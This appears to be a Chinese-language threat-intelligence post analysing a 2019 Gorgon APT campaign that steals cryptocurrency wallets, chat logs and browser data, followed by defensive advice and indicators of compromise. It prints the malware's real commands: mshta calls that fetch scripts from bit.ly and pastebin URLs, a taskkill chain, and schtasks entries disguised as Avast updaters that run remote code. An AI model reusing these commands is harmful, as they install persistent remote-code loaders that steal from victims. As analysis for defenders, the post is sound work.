Gorgon APT黑客組織覬覦虛擬貨幣錢包

• 2019 年 10 月 10 日
• 筆記

背景

Gorgon APT組織是一個被認為來自巴基斯坦的攻擊組織，該組織在2018年8月份由Palo Alto Unit42團隊進行披露，主要針對全球外貿人士進行攻擊。除此之外，安全研究人員還發現Gorgon針對英國、西班牙、俄羅斯、美國等政府目標發起了攻擊，算是APT組織的後起之秀，最近一年非常活躍。

近日，深信服安全團隊發現了Gorgon APT組織最新變種樣本，此樣本釋放了一個盜取受害者虛擬幣錢包的木馬。

/攻擊流程圖/

樣本分析

1.樣本中包含惡意的宏程式碼，如下所示：

2.通過動態調試，宏程式碼調用mshta.exe執行mshtahttp://bitly.com/6xdfsSXsh6，訪問短鏈接網址http://bitly.com/6xdfsSXsh6,如下所示：

3.短鏈接跳轉到網站，網站包含惡意腳本，如下所示：https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

4.解密裡面的惡意腳本，如下所示：

5.調用mshta.exe執行mshta.exe http://www.pastebin.com/raw/UZEbWMK9，訪問http://www.pastebin.com/raw/UZEbWMK9網站的內容，如下所示：

6.解密上面的惡意腳本內容，如下所示：

7.調用cmd.exe程式，執行如下命令，結束相關進程:

"C:WindowsSystem32cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit

8.將以下命令，寫入自啟動註冊表項：

mshta.exehttp://pastebin.com/raw/hJjQuQv1

9.通過命令，創建兩個計劃任務啟動項Avast Updater和Avast backup，如下所示：

"C:WindowsSystem32schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exehttp://pastebin.com/raw/BrH6UFRc" /F    "C:WindowsSystem32schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exehttp://pastebin.com/raw/nhcP3XgH" /F

10.上面三個自啟動項，分別執行三個不同的腳本，如下所示：

http://pastebin.com/raw/hJjQuQv1  http://pastebin.com/raw/BrH6UFRc  http://pastebin.com/raw/nhcP3XgH

hJjQuQv1腳本解密之後，如下所示：

BrH6UFRc腳本解密之後，如下所示：

再次解密腳本，如下所示：

11.下載https://pastebin.com/raw/dkrjWec2腳本並執行，腳本內容，如下所示：

解密腳本之後，如下所示：

12.解密之後替換裡面的字元串，然後載入執行，如下所示：

13.替換之後，是一個PE文件，如下所示：

14.通過查看這個PE文件為NET編寫的注入程式，如下所示：

15.將PE程式注入到calc.exe進程中，下載https://pastebin.com/raw/j8mRken0腳本內容，然後替換裡面的@!並執行，腳本內容，如下所示：

16.解密腳本之後也是一個PE文件，如下所示：

17.把這個解密出來的PE程式通過上面解密出來的PE注入程式，注入到calc.exe進程中，此PE程式，盜取受害者虛擬錢包數據，例如比特幣，萊特幣等，如下所示：

18.盜取受害者聊天工具記錄，例如：Skype、Telegram等，如下所示：

19.螢幕截圖操作，如下所示：

20.獲取受害者主機相關資訊，當前IP地址或區域資訊以及磁碟文件名等，如下所示：

21.盜取受害者瀏覽器歷史記錄資訊等，如下所示：

22.遠程伺服器URL：http://216.170.126.139/Panel/10/index.php，捕獲到的數據包流量，如下所示：

23.nhcP3XgH腳本解密之後，如下所示：

安全建議：

不管攻擊者的入侵計劃是多麼的縝密，總會由於技術的限制留下些許蛛絲馬跡，譬如軟體的植入、網路流量的產生，這些痕迹可能並不足以作為APT攻擊的證據，但一旦發現，就必須提高警惕，並及時的保存現場，通知安全相關人員，對疑似感染的主機進行隔離和檢查。同時也要注意日常防範措施，在思想上和技術上雙管齊下：

1、加強人員安全防範意識。不要打開來歷不明的郵件附件，對於郵件附件中的文件要謹慎運行，如發現腳本或其他可執行文件可先使用殺毒軟體進行掃描； 2、升級office系列軟體到最新版本，不要隨意運行不可信文檔中的宏； 3、部署分層控制，實現深度網路安全防禦，構建端到端的立體安全防護網路。在網路規劃時需要充分考慮終端接入安全、內網安全防護、應用系統安全等多個維度，並根據不同的業務需求和安全等級進行合理的分區隔離； 4、重視網路數據、系統運行狀態的審計和分析。嚴格把控系統的訪問許可權，持續對數據流的進出進行有效的監控，及時更新安全修補程式，定時進行安全配置基準線的審視和系統安全風險的評估，及時發現可以行為並通過通訊線路加密、應用層安全掃描與防護、隔離等有效技術手段將可能的安全風險扼殺在搖籃里。

IOCs

MD5:

A137185171B1176FC125A74250928933 A5DE91F73A5E75AA7E33954FD0ADDA13 E0CE8A86F85C506591BE8897C07FB626

URL：

http://bitly.com/6xdfsSXsh6 https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html http://www.pastebin.com/raw/UZEbWMK9 http://pastebin.com/raw/hJjQuQv1 http://pastebin.com/raw/BrH6UFRc http://pastebin.com/raw/nhcP3XgH http://216.170.126.139/Panel/10/index.php

IP ：

216.170.126.139